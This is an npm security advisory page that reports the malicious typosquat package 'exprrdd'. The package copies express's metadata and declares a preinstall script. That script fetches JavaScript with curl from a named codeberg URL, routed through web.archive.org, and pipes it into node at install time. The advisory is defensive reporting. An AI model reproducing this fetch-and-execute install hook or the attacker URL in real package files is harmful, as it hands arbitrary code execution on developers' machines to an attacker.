Logo
npm

exprrdd@5.2.1

Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC

Malicious

OSV ID

MAL-2026-17244

Ecosystem

npm

Summary

Package 'exprrdd' copies express's metadata (name-lookalike, description, author, contributors, repository, keywords, dependencies) as cover for a preinstall dropper. package.json line 98 declares a preinstall script that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js and pipes the response directly into node, executing attacker-controlled JavaScript on the installer's machine at npm install time. The fetched script is unpinned and mutable (a raw branch URL fronted by a web.archive.org rewrite), so whoever controls the codeberg.org/hellscripter repository gains arbitrary code execution on every host that installs this package. The typosquat name maximizes accidental installs by developers mistyping 'express'.

Source: amazon-inspector (bc1c956097cd13e80298a796a5026ebd91ece7c2ad53d226d3729f0b0b0ee9f3)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.